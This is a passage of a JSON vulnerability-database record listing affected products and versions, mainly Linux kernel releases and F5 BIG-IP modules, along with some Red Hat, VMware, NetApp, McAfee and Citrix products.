      },
      {
        "model": "enterprise linux server update services for sap solutions",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9.4"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.4"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.12"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.19.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.3"
      },
      {
        "model": "big-ip afm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip link controller hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.40"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.9"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.5"
      },
      {
        "model": "big-ip asm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.8"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.6"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.17.11"
      },
      {
        "model": "e-series santricity os controller software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "11.0"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.0"
      },
      {
        "model": "big-ip analytics hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.5"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.47"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.6"
      },
      {
        "model": "big-ip afm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.2"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "traffix sdc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "5.1"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.16.11"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3.3"
      },
      {
        "model": "big-ip analytics hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-ip gtm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-ip link controller hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.13"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.2"
      },
      {
        "model": "vcloud usage meter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.34"
      },
      {
        "model": "virtual storage console for vmware vsphere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "7.2"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "big-ip asm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "enterprise linux for power little endian extended update supp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.5"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.8"
      },
      {
        "model": "big-ip afm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.59"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.36"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "secure pulse policy secure",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "pulse",
        "version": "0"
      },
      {
        "model": "openshift container platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.1"
      },
      {
        "model": "enterprise mrg",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2"
      },
      {
        "model": "big-ip apm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.75"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.66"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.32"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.5"
      },
      {
        "model": "big-ip fps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.63"
      },
      {
        "model": "big-ip analytics hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.8"
      },
      {
        "model": "big-ip asm hf6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "big-ip ltm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.0.0.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.21"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.8"
      },
      {
        "model": "big-ip apm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.24"
      },
      {
        "model": "enterprise linux for ibm z systems extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.3"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.6"
      },
      {
        "model": "big-ip aam hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "enterprise linux for real time for nfv",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "8"
      },
      {
        "model": "big-ip ltm hf6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.73"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18"
      },
      {
        "model": "big-ip link controller hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "big-ip analytics build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.40.1.256"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip aam hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.3"
      },
      {
        "model": "enterprise pks",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.0.0.3"
      },
      {
        "model": "big-ip pem hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.22"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.5"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.0.0.2"
      },
      {
        "model": "hci compute nodes",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.4"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3"
      },
      {
        "model": "big-ip ltm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.9"
      },
      {
        "model": "vcenter server appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.14"
      },
      {
        "model": "big-ip link controller hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.43"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.6"
      },
      {
        "model": "big-ip apm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "vasa provider for clustered data ontap",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "7.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.61"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.17"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.12"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.9"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.7"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.2"
      },
      {
        "model": "big-ip pem hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-ip gtm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "vsphere replication",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.42"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.12"
      },
      {
        "model": "big-ip asm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.9"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "15.0"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.11"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.15.11"
      },
      {
        "model": "enterprise linux for ibm z systems extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.4"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.58"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.2"
      },
      {
        "model": "appdefense",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "big-ip fps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.7"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.4"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.10.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.52"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.16.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.46"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.3"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.19.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "big-ip ltm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.66.204.442"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.3"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.51"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "integrated openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.2"
      },
      {
        "model": "big-ip afm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "xenserver ltsr cu2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "7.1"
      },
      {
        "model": "big-ip afm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.4"
      },
      {
        "model": "big-ip afm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.73"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.12"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.1"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.41"
      },
      {
        "model": "big-ip asm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.72"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.6"
      },
      {
        "model": "codeready linux builder for x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "8"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1613"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.0-28"
      },
      {
        "model": "big-ip link controller build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.66.204.442"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.10"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "13.1.0.5"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "14.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.8"
      },
      {
        "model": "network threat behavior analysis appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "9.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.32"
      },
      {
        "model": "big-ip asm hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "big-ip apm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.40.1.256"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.13"
      },
      {
        "model": "siem enterprise security manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "11.1"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.9"
      },
      {
        "model": "kernel",
